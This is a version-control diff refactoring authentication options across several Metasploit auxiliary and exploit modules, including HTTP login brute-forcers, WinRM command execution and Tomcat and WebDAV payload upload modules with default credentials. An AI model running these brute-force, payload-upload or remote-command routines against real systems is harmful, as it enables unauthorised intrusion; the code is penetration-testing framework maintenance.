last of revert-merge snaffu
parent
6abbbeb3ca
commit
0ae489b37b
|
@ -38,10 +38,10 @@ class Metasploit4 < Msf::Auxiliary
|
||||||
))
|
))
|
||||||
|
|
||||||
# disabling all the unnecessary options that someone might set to break our query
|
# disabling all the unnecessary options that someone might set to break our query
|
||||||
deregister_options('RPORT','RHOST', 'BasicAuthPass', 'BasicAuthUser', 'DOMAIN',
|
deregister_options('RPORT','RHOST', 'DOMAIN',
|
||||||
'DigestAuthIIS', 'SSLVersion', 'NTLM::SendLM', 'NTLM::SendNTLM',
|
'DigestAuthIIS', 'SSLVersion', 'NTLM::SendLM', 'NTLM::SendNTLM',
|
||||||
'NTLM::SendSPN', 'NTLM::UseLMKey', 'NTLM::UseNTLM2_session',
|
'NTLM::SendSPN', 'NTLM::UseLMKey', 'NTLM::UseNTLM2_session',
|
||||||
'NTLM::UseNTLMv2', 'DigestAuthPassword', 'DigestAuthUser', 'SSL')
|
'NTLM::UseNTLMv2','SSL')
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
|
|
|
@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
'Name' => 'Cisco Device HTTP Device Manager Access',
|
'Name' => 'Cisco Device HTTP Device Manager Access',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module gathers data from a Cisco device (router or switch) with the device manager
|
This module gathers data from a Cisco device (router or switch) with the device manager
|
||||||
web interface exposed. The BasicAuthUser and BasicAuthPass options can be used to specify
|
web interface exposed. The USERNAME and PASSWORD options can be used to specify
|
||||||
authentication.
|
authentication.
|
||||||
},
|
},
|
||||||
'Author' => [ 'hdm' ],
|
'Author' => [ 'hdm' ],
|
||||||
|
@ -61,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
print_good("#{rhost}:#{rport} Successfully authenticated to this device")
|
print_good("#{rhost}:#{rport} Successfully authenticated to this device")
|
||||||
|
|
||||||
# Report a vulnerability only if no password was specified
|
# Report a vulnerability only if no password was specified
|
||||||
if datastore['BasicAuthPass'].to_s.length == 0
|
if datastore['PASSWORD'].to_s.length == 0
|
||||||
|
|
||||||
report_vuln(
|
report_vuln(
|
||||||
{
|
{
|
||||||
|
|
|
@ -48,9 +48,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
register_autofilter_ports([ 80, 443, 8080, 8081, 8000, 8008, 8443, 8444, 8880, 8888 ])
|
register_autofilter_ports([ 80, 443, 8080, 8081, 8000, 8008, 8443, 8444, 8880, 8888 ])
|
||||||
end
|
end
|
||||||
|
|
||||||
def find_auth_uri_and_scheme
|
def find_auth_uri
|
||||||
|
|
||||||
path_and_scheme = []
|
|
||||||
if datastore['AUTH_URI'] and datastore['AUTH_URI'].length > 0
|
if datastore['AUTH_URI'] and datastore['AUTH_URI'].length > 0
|
||||||
paths = [datastore['AUTH_URI']]
|
paths = [datastore['AUTH_URI']]
|
||||||
else
|
else
|
||||||
|
@ -80,21 +79,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
next if not res
|
next if not res
|
||||||
end
|
end
|
||||||
|
|
||||||
next if not res.code == 401
|
return path
|
||||||
next if not res.headers['WWW-Authenticate']
|
|
||||||
path_and_scheme << path
|
|
||||||
case res.headers['WWW-Authenticate']
|
|
||||||
when /Basic/i
|
|
||||||
path_and_scheme << "Basic"
|
|
||||||
when /NTLM/i
|
|
||||||
path_and_scheme << "NTLM"
|
|
||||||
when /Digest/i
|
|
||||||
path_and_scheme << "Digest"
|
|
||||||
end
|
|
||||||
return path_and_scheme
|
|
||||||
end
|
end
|
||||||
|
|
||||||
return path_and_scheme
|
return path
|
||||||
end
|
end
|
||||||
|
|
||||||
def target_url
|
def target_url
|
||||||
|
@ -111,7 +99,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
print_error("You need need to set AUTH_URI when using PUT Method !")
|
print_error("You need need to set AUTH_URI when using PUT Method !")
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
@uri, @scheme = find_auth_uri_and_scheme()
|
@uri = find_auth_uri
|
||||||
if ! @uri
|
if ! @uri
|
||||||
print_error("#{target_url} No URI found that asks for HTTP authentication")
|
print_error("#{target_url} No URI found that asks for HTTP authentication")
|
||||||
return
|
return
|
||||||
|
@ -119,12 +107,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
@uri = "/#{@uri}" if @uri[0,1] != "/"
|
@uri = "/#{@uri}" if @uri[0,1] != "/"
|
||||||
|
|
||||||
if ! @scheme
|
print_status("Attempting to login to #{target_url}")
|
||||||
print_error("#{target_url} Incompatible authentication scheme")
|
|
||||||
return
|
|
||||||
end
|
|
||||||
|
|
||||||
print_status("Attempting to login to #{target_url} with #{@scheme} authentication")
|
|
||||||
|
|
||||||
each_user_pass { |user, pass|
|
each_user_pass { |user, pass|
|
||||||
do_login(user, pass)
|
do_login(user, pass)
|
||||||
|
@ -133,27 +116,21 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
def do_login(user='admin', pass='admin')
|
def do_login(user='admin', pass='admin')
|
||||||
vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'")
|
vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'")
|
||||||
success = false
|
|
||||||
proof = ""
|
|
||||||
|
|
||||||
ret = do_http_login(user,pass,@scheme)
|
response = do_http_login(user,pass)
|
||||||
return :abort if ret == :abort
|
result = determine_result(response)
|
||||||
if ret == :success
|
|
||||||
proof = @proof.dup
|
|
||||||
success = true
|
|
||||||
end
|
|
||||||
|
|
||||||
if success
|
if result == :success
|
||||||
print_good("#{target_url} - Successful login '#{user}' : '#{pass}'")
|
print_good("#{target_url} - Successful login '#{user}' : '#{pass}'")
|
||||||
|
|
||||||
any_user = false
|
any_user = false
|
||||||
any_pass = false
|
any_pass = false
|
||||||
|
|
||||||
vprint_status("#{target_url} - Trying random username with password:'#{pass}'")
|
vprint_status("#{target_url} - Trying random username with password:'#{pass}'")
|
||||||
any_user = do_http_login(Rex::Text.rand_text_alpha(8), pass, @scheme)
|
any_user = determine_result(do_http_login(Rex::Text.rand_text_alpha(8), pass))
|
||||||
|
|
||||||
vprint_status("#{target_url} - Trying username:'#{user}' with random password")
|
vprint_status("#{target_url} - Trying username:'#{user}' with random password")
|
||||||
any_pass = do_http_login(user, Rex::Text.rand_text_alpha(8), @scheme)
|
any_pass = determine_result(do_http_login(user, Rex::Text.rand_text_alpha(8)))
|
||||||
|
|
||||||
if any_user == :success
|
if any_user == :success
|
||||||
user = "anyuser"
|
user = "anyuser"
|
||||||
|
@ -175,7 +152,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
:sname => (ssl ? 'https' : 'http'),
|
:sname => (ssl ? 'https' : 'http'),
|
||||||
:user => user,
|
:user => user,
|
||||||
:pass => pass,
|
:pass => pass,
|
||||||
:proof => "WEBAPP=\"Generic\", PROOF=#{proof}",
|
:proof => "WEBAPP=\"Generic\", PROOF=#{response.to_s}",
|
||||||
:source_type => "user_supplied",
|
:source_type => "user_supplied",
|
||||||
:active => true
|
:active => true
|
||||||
)
|
)
|
||||||
|
@ -188,142 +165,25 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
def do_http_login(user,pass,scheme)
|
def do_http_login(user,pass)
|
||||||
case scheme
|
|
||||||
when /NTLM/i
|
|
||||||
do_http_auth_ntlm(user,pass)
|
|
||||||
when /Digest/i
|
|
||||||
do_http_auth_digest(user,pass,datastore['REQUESTTYPE'])
|
|
||||||
when /Basic/i
|
|
||||||
do_http_auth_basic(user,pass)
|
|
||||||
else
|
|
||||||
vprint_error("#{target_url}: Unknown authentication scheme")
|
|
||||||
return :abort
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
def do_http_auth_ntlm(user,pass)
|
|
||||||
begin
|
begin
|
||||||
resp,c = send_http_auth_ntlm(
|
response = send_request_cgi({
|
||||||
'uri' => @uri,
|
'uri' => @uri,
|
||||||
|
'method' => datastore['REQUESTTYPE'],
|
||||||
'username' => user,
|
'username' => user,
|
||||||
'password' => pass
|
'password' => pass
|
||||||
)
|
})
|
||||||
c.close
|
return response
|
||||||
return :abort if (resp.code == 404)
|
|
||||||
|
|
||||||
if [200, 301, 302].include?(resp.code)
|
|
||||||
@proof = resp
|
|
||||||
return :success
|
|
||||||
end
|
|
||||||
|
|
||||||
rescue ::Rex::ConnectionError
|
rescue ::Rex::ConnectionError
|
||||||
vprint_error("#{target_url} - Failed to connect to the web server")
|
vprint_error("#{target_url} - Failed to connect to the web server")
|
||||||
return :abort
|
return nil
|
||||||
end
|
end
|
||||||
|
|
||||||
return :fail
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def do_http_auth_basic(user,pass)
|
def determine_result(response)
|
||||||
user_pass = Rex::Text.encode_base64(user + ":" + pass)
|
return :abort unless response.kind_of? Rex::Proto::Http::Response
|
||||||
|
return :abort unless response.code
|
||||||
begin
|
return :success if [200, 301, 302].include?(response.code)
|
||||||
res = send_request_cgi({
|
|
||||||
'uri' => @uri,
|
|
||||||
'method' => 'GET',
|
|
||||||
'headers' =>
|
|
||||||
{
|
|
||||||
'Authorization' => "Basic #{user_pass}",
|
|
||||||
}
|
|
||||||
}, 25)
|
|
||||||
|
|
||||||
unless (res.kind_of? Rex::Proto::Http::Response)
|
|
||||||
vprint_error("#{target_url} not responding")
|
|
||||||
return :abort
|
|
||||||
end
|
|
||||||
|
|
||||||
return :abort if (res.code == 404)
|
|
||||||
|
|
||||||
if [200, 301, 302].include?(res.code)
|
|
||||||
@proof = res
|
|
||||||
return :success
|
|
||||||
end
|
|
||||||
|
|
||||||
rescue ::Rex::ConnectionError
|
|
||||||
vprint_error("#{target_url} - Failed to connect to the web server")
|
|
||||||
return :abort
|
|
||||||
end
|
|
||||||
|
|
||||||
return :fail
|
|
||||||
end
|
|
||||||
|
|
||||||
def do_http_auth_digest(user,pass,requesttype)
|
|
||||||
path = datastore['AUTH_URI'] || "/"
|
|
||||||
begin
|
|
||||||
if requesttype == "PUT"
|
|
||||||
res,c = send_digest_request_cgi({
|
|
||||||
'uri' => path,
|
|
||||||
'method' => requesttype,
|
|
||||||
'data' => 'Test123\r\n',
|
|
||||||
#'DigestAuthIIS' => false,
|
|
||||||
'DigestAuthUser' => user,
|
|
||||||
'DigestAuthPassword' => pass
|
|
||||||
}, 25)
|
|
||||||
elsif requesttype == "PROPFIND"
|
|
||||||
res,c = send_digest_request_cgi({
|
|
||||||
'uri' => path,
|
|
||||||
'method' => requesttype,
|
|
||||||
'data' => '<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:allprop/></D:propfind>',
|
|
||||||
#'DigestAuthIIS' => false,
|
|
||||||
'DigestAuthUser' => user,
|
|
||||||
'DigestAuthPassword' => pass,
|
|
||||||
'headers' => { 'Depth' => '0'}
|
|
||||||
}, 25)
|
|
||||||
else
|
|
||||||
res,c = send_digest_request_cgi({
|
|
||||||
'uri' => path,
|
|
||||||
'method' => requesttype,
|
|
||||||
#'DigestAuthIIS' => false,
|
|
||||||
'DigestAuthUser' => user,
|
|
||||||
'DigestAuthPassword' => pass
|
|
||||||
}, 25)
|
|
||||||
end
|
|
||||||
|
|
||||||
unless (res.kind_of? Rex::Proto::Http::Response)
|
|
||||||
vprint_error("#{target_url} not responding")
|
|
||||||
return :abort
|
|
||||||
end
|
|
||||||
|
|
||||||
return :abort if (res.code == 404)
|
|
||||||
|
|
||||||
if ( [200, 301, 302].include?(res.code) ) or (res.code == 201)
|
|
||||||
if ((res.code == 201) and (requesttype == "PUT"))
|
|
||||||
print_good("Trying to delete #{path}")
|
|
||||||
del_res,c = send_digest_request_cgi({
|
|
||||||
'uri' => path,
|
|
||||||
'method' => 'DELETE',
|
|
||||||
'DigestAuthUser' => user,
|
|
||||||
'DigestAuthPassword' => pass
|
|
||||||
}, 25)
|
|
||||||
if not (del_res.code == 204)
|
|
||||||
print_error("#{path} could be created, but not deleted again. This may have been noisy ...")
|
|
||||||
end
|
|
||||||
end
|
|
||||||
@proof = res
|
|
||||||
return :success
|
|
||||||
end
|
|
||||||
|
|
||||||
if (res.code == 207) and (requesttype == "PROPFIND")
|
|
||||||
@proof = res
|
|
||||||
return :success
|
|
||||||
end
|
|
||||||
|
|
||||||
rescue ::Rex::ConnectionError
|
|
||||||
vprint_error("#{target_url} - Failed to connect to the web server")
|
|
||||||
return :abort
|
|
||||||
end
|
|
||||||
|
|
||||||
return :fail
|
return :fail
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -101,16 +101,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
vprint_status("#{rhost}:#{rport} - Trying username:'#{user}' with password:'#{pass}'")
|
vprint_status("#{rhost}:#{rport} - Trying username:'#{user}' with password:'#{pass}'")
|
||||||
success = false
|
success = false
|
||||||
srvhdr = '?'
|
srvhdr = '?'
|
||||||
user_pass = Rex::Text.encode_base64(user + ":" + pass)
|
|
||||||
uri = normalize_uri(datastore['URI'])
|
uri = normalize_uri(datastore['URI'])
|
||||||
begin
|
begin
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'uri' => uri,
|
'uri' => uri,
|
||||||
'method' => 'GET',
|
'method' => 'GET',
|
||||||
'headers' =>
|
'username' => user,
|
||||||
{
|
'password' => pass
|
||||||
'Authorization' => "Basic #{user_pass}",
|
|
||||||
}
|
|
||||||
}, 25)
|
}, 25)
|
||||||
unless (res.kind_of? Rex::Proto::Http::Response)
|
unless (res.kind_of? Rex::Proto::Http::Response)
|
||||||
vprint_error("http://#{rhost}:#{rport}#{uri} not responding")
|
vprint_error("http://#{rhost}:#{rport}#{uri} not responding")
|
||||||
|
|
|
@ -40,10 +40,6 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
|
|
||||||
def run_host(ip)
|
def run_host(ip)
|
||||||
unless accepts_ntlm_auth
|
|
||||||
print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth"
|
|
||||||
return
|
|
||||||
end
|
|
||||||
streams = winrm_run_cmd(datastore['CMD'])
|
streams = winrm_run_cmd(datastore['CMD'])
|
||||||
return unless streams.class == Hash
|
return unless streams.class == Hash
|
||||||
print_error streams['stderr'] unless streams['stderr'] == ''
|
print_error streams['stderr'] unless streams['stderr'] == ''
|
||||||
|
|
|
@ -39,12 +39,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
|
|
||||||
def run_host(ip)
|
def run_host(ip)
|
||||||
unless accepts_ntlm_auth
|
|
||||||
print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth"
|
|
||||||
return
|
|
||||||
end
|
|
||||||
each_user_pass do |user, pass|
|
each_user_pass do |user, pass|
|
||||||
resp,c = send_request_ntlm(test_request)
|
resp = send_winrm_request(test_request)
|
||||||
if resp.nil?
|
if resp.nil?
|
||||||
print_error "#{ip}:#{rport}: Got no reply from the server, connection may have timed out"
|
print_error "#{ip}:#{rport}: Got no reply from the server, connection may have timed out"
|
||||||
return
|
return
|
||||||
|
|
|
@ -42,12 +42,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
|
|
||||||
def run_host(ip)
|
def run_host(ip)
|
||||||
unless accepts_ntlm_auth
|
resp = send_winrm_request(winrm_wql_msg(datastore['WQL']))
|
||||||
print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth"
|
|
||||||
return
|
|
||||||
end
|
|
||||||
|
|
||||||
resp,c = send_request_ntlm(winrm_wql_msg(datastore['WQL']))
|
|
||||||
if resp.nil?
|
if resp.nil?
|
||||||
print_error "Got no reply from the server"
|
print_error "Got no reply from the server"
|
||||||
return
|
return
|
||||||
|
|
|
@ -84,8 +84,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
'IPC$,ADMIN$,C$,D$,CCMLOGS$,ccmsetup$,share,netlogon,sysvol'])
|
'IPC$,ADMIN$,C$,D$,CCMLOGS$,ccmsetup$,share,netlogon,sysvol'])
|
||||||
], self.class)
|
], self.class)
|
||||||
|
|
||||||
deregister_options('BasicAuthPass', 'BasicAuthUser', 'DOMAIN', 'DigestAuthPassword',
|
deregister_options('DOMAIN', 'NTLM::SendLM', 'NTLM::SendSPN', 'NTLM::SendNTLM', 'NTLM::UseLMKey',
|
||||||
'DigestAuthUser', 'NTLM::SendLM', 'NTLM::SendSPN', 'NTLM::SendNTLM', 'NTLM::UseLMKey',
|
|
||||||
'NTLM::UseNTLM2_session', 'NTLM::UseNTLMv2')
|
'NTLM::UseNTLM2_session', 'NTLM::UseNTLMv2')
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -72,8 +72,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
OptString.new('BasicAuthUser', [true, 'The HTTP username to specify for basic authentication', 'piranha']),
|
OptString.new('USERNAME', [true, 'The HTTP username to specify for basic authentication', 'piranha']),
|
||||||
OptString.new('BasicAuthPass', [true, 'The HTTP password to specify for basic authentication', 'q']),
|
OptString.new('PASSWORD', [true, 'The HTTP password to specify for basic authentication', 'q'])
|
||||||
], self.class)
|
], self.class)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -96,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
if res.code == 401
|
if res.code == 401
|
||||||
print_error("401 Authorization Required! Our BasicAuthUser and BasicAuthPass credentials not accepted!")
|
print_error("401 Authorization Required! Our Credentials not accepted!")
|
||||||
elsif (res.code == 200 and res.body =~ /The passwords you supplied match/)
|
elsif (res.code == 200 and res.body =~ /The passwords you supplied match/)
|
||||||
print_status("Command successfully executed (according to the server).")
|
print_status("Command successfully executed (according to the server).")
|
||||||
end
|
end
|
||||||
|
|
|
@ -227,9 +227,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
authmsg = res.headers['WWW-Authenticate']
|
authmsg = res.headers['WWW-Authenticate']
|
||||||
end
|
end
|
||||||
print_error("The remote server responded expecting authentication")
|
print_error("The remote server responded expecting authentication")
|
||||||
if datastore['BasicAuthUser'] and datastore['BasicAuthPass']
|
if authmsg
|
||||||
print_error("BasicAuthUser \"%s\" failed to authenticate" % datastore['BasicAuthUser'])
|
|
||||||
elsif authmsg
|
|
||||||
print_error("WWW-Authenticate: %s" % authmsg)
|
print_error("WWW-Authenticate: %s" % authmsg)
|
||||||
end
|
end
|
||||||
cleanup_instructions(rpath, name) # display cleanup info
|
cleanup_instructions(rpath, name) # display cleanup info
|
||||||
|
|
|
@ -96,9 +96,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
datastore['BasicAuthUser'] = datastore['USERNAME']
|
|
||||||
datastore['BasicAuthPass'] = datastore['PASSWORD']
|
|
||||||
|
|
||||||
jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8))
|
jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8))
|
||||||
app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8))
|
app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8))
|
||||||
|
|
||||||
|
|
|
@ -123,9 +123,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
datastore['BasicAuthUser'] = datastore['USERNAME']
|
|
||||||
datastore['BasicAuthPass'] = datastore['PASSWORD']
|
|
||||||
|
|
||||||
jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8))
|
jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8))
|
||||||
app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8))
|
app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8))
|
||||||
|
|
||||||
|
|
|
@ -112,9 +112,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def check
|
def check
|
||||||
datastore['BasicAuthUser'] = datastore['USERNAME']
|
|
||||||
datastore['BasicAuthPass'] = datastore['PASSWORD']
|
|
||||||
|
|
||||||
res = query_serverinfo
|
res = query_serverinfo
|
||||||
disconnect
|
disconnect
|
||||||
return CheckCode::Unknown if res.nil?
|
return CheckCode::Unknown if res.nil?
|
||||||
|
@ -127,8 +124,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
:host => rhost,
|
:host => rhost,
|
||||||
:port => rport,
|
:port => rport,
|
||||||
:sname => (ssl ? "https" : "http"),
|
:sname => (ssl ? "https" : "http"),
|
||||||
:user => datastore['BasicAuthUser'],
|
:user => datastore['USERNAME'],
|
||||||
:pass => datastore['BasicAuthPass'],
|
:pass => datastore['PASSWORD'],
|
||||||
:proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}",
|
:proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}",
|
||||||
:active => true
|
:active => true
|
||||||
)
|
)
|
||||||
|
@ -164,9 +161,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
datastore['BasicAuthUser'] = datastore['USERNAME']
|
|
||||||
datastore['BasicAuthPass'] = datastore['PASSWORD']
|
|
||||||
|
|
||||||
mytarget = target
|
mytarget = target
|
||||||
if (target.name =~ /Automatic/)
|
if (target.name =~ /Automatic/)
|
||||||
mytarget = auto_target
|
mytarget = auto_target
|
||||||
|
@ -221,8 +215,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
:host => rhost,
|
:host => rhost,
|
||||||
:port => rport,
|
:port => rport,
|
||||||
:sname => (ssl ? "https" : "http"),
|
:sname => (ssl ? "https" : "http"),
|
||||||
:user => datastore['BasicAuthUser'],
|
:user => datastore['USERNAME'],
|
||||||
:pass => datastore['BasicAuthPass'],
|
:pass => datastore['PASSWORD'],
|
||||||
:proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}",
|
:proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}",
|
||||||
:active => true
|
:active => true
|
||||||
)
|
)
|
||||||
|
|
|
@ -67,9 +67,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def go(command)
|
def go(command)
|
||||||
datastore['BasicAuthUser'] = datastore['USERNAME']
|
|
||||||
datastore['BasicAuthPass'] = datastore['PASSWORD']
|
|
||||||
|
|
||||||
xml = <<-EOS
|
xml = <<-EOS
|
||||||
<?xml version="1.0"?>
|
<?xml version="1.0"?>
|
||||||
<methodCall>
|
<methodCall>
|
||||||
|
|
|
@ -72,8 +72,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
Opt::RPORT(8080),
|
Opt::RPORT(8080),
|
||||||
OptString.new('BasicAuthUser', [true, 'The HTTP username to specify for basic authentication', 'anonymous']),
|
OptString.new('USERNAME', [true, 'The HTTP username to specify for basic authentication', 'anonymous']),
|
||||||
OptString.new('BasicAuthPass', [true, 'The HTTP password to specify for basic authentication', 'mozilla@example.com']),
|
OptString.new('PASSWORD', [true, 'The HTTP password to specify for basic authentication', 'mozilla@example.com'])
|
||||||
], self.class)
|
], self.class)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -36,8 +36,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
[
|
[
|
||||||
OptString.new('PATH', [ true, "The path to attempt to upload", '/webdav/']),
|
OptString.new('PATH', [ true, "The path to attempt to upload", '/webdav/']),
|
||||||
OptString.new('FILENAME', [ false , "The filename to give the payload. (Leave Blank for Random)"]),
|
OptString.new('FILENAME', [ false , "The filename to give the payload. (Leave Blank for Random)"]),
|
||||||
OptString.new('RUSER', [ true, "The Username to use for Authentication", 'wampp']),
|
OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', 'wampp']),
|
||||||
OptString.new('RPASS', [ true, "The Password to use for Authentication", 'xampp'])
|
OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', 'xampp'])
|
||||||
], self.class)
|
], self.class)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -46,12 +46,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
def exploit
|
def exploit
|
||||||
uri = build_path
|
uri = build_path
|
||||||
print_status "Uploading Payload to #{uri}"
|
print_status "Uploading Payload to #{uri}"
|
||||||
res,c = send_digest_request_cgi({
|
res = send_request_cgi({
|
||||||
'uri' => uri,
|
'uri' => uri,
|
||||||
'method' => 'PUT',
|
'method' => 'PUT',
|
||||||
'data' => payload.raw,
|
'data' => payload.raw,
|
||||||
'DigestAuthUser' => datastore['RUSER'],
|
'username' => datastore['USERNAME'],
|
||||||
'DigestAuthPassword' => datastore['RPASS']
|
'password' => datastore['PASSWORD']
|
||||||
}, 25)
|
}, 25)
|
||||||
unless (res and res.code == 201)
|
unless (res and res.code == 201)
|
||||||
print_error "Failed to upload file!"
|
print_error "Failed to upload file!"
|
||||||
|
|
|
@ -66,20 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
@compat_mode = false
|
@compat_mode = false
|
||||||
end
|
end
|
||||||
|
|
||||||
def check
|
|
||||||
unless accepts_ntlm_auth
|
|
||||||
print_error "The Remote WinRM server does not appear to allow Negotiate (NTLM) auth"
|
|
||||||
return Msf::Exploit::CheckCode::Safe
|
|
||||||
end
|
|
||||||
|
|
||||||
return Msf::Exploit::CheckCode::Vulnerable
|
|
||||||
end
|
|
||||||
|
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
unless check == Msf::Exploit::CheckCode::Vulnerable
|
|
||||||
return
|
|
||||||
end
|
|
||||||
unless valid_login?
|
unless valid_login?
|
||||||
print_error "Login Failure. Recheck your credentials"
|
print_error "Login Failure. Recheck your credentials"
|
||||||
return
|
return
|
||||||
|
@ -141,7 +128,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
def temp_dir
|
def temp_dir
|
||||||
print_status "Grabbing %TEMP%"
|
print_status "Grabbing %TEMP%"
|
||||||
resp,c = send_request_ntlm(winrm_open_shell_msg)
|
resp = send_winrm_request(winrm_open_shell_msg)
|
||||||
if resp.nil?
|
if resp.nil?
|
||||||
print_error "Got no reply from the server"
|
print_error "Got no reply from the server"
|
||||||
return nil
|
return nil
|
||||||
|
@ -152,16 +139,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
shell_id = winrm_get_shell_id(resp)
|
shell_id = winrm_get_shell_id(resp)
|
||||||
cmd = "echo %TEMP%"
|
cmd = "echo %TEMP%"
|
||||||
resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id))
|
resp = send_winrm_request(winrm_cmd_msg(cmd, shell_id))
|
||||||
cmd_id = winrm_get_cmd_id(resp)
|
cmd_id = winrm_get_cmd_id(resp)
|
||||||
resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id))
|
resp = send_winrm_request(winrm_cmd_recv_msg(shell_id,cmd_id))
|
||||||
streams = winrm_get_cmd_streams(resp)
|
streams = winrm_get_cmd_streams(resp)
|
||||||
return streams['stdout'].chomp
|
return streams['stdout'].chomp
|
||||||
end
|
end
|
||||||
|
|
||||||
def check_remote_arch
|
def check_remote_arch
|
||||||
wql = %q{select AddressWidth from Win32_Processor where DeviceID="CPU0"}
|
wql = %q{select AddressWidth from Win32_Processor where DeviceID="CPU0"}
|
||||||
resp,c = send_request_ntlm(winrm_wql_msg(wql))
|
resp = send_winrm_request(winrm_wql_msg(wql))
|
||||||
#Default to x86 if we can't be sure
|
#Default to x86 if we can't be sure
|
||||||
return "x86" if resp.nil? or resp.code != 200
|
return "x86" if resp.nil? or resp.code != 200
|
||||||
resp_tbl = parse_wql_response(resp)
|
resp_tbl = parse_wql_response(resp)
|
||||||
|
@ -247,7 +234,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
def valid_login?
|
def valid_login?
|
||||||
data = winrm_wql_msg("Select Name,Status from Win32_Service")
|
data = winrm_wql_msg("Select Name,Status from Win32_Service")
|
||||||
resp,c = send_request_ntlm(data)
|
resp = send_winrm_request(data)
|
||||||
unless resp.code == 200
|
unless resp.code == 200
|
||||||
return false
|
return false
|
||||||
end
|
end
|
||||||
|
|
Loading…
Reference in New Issue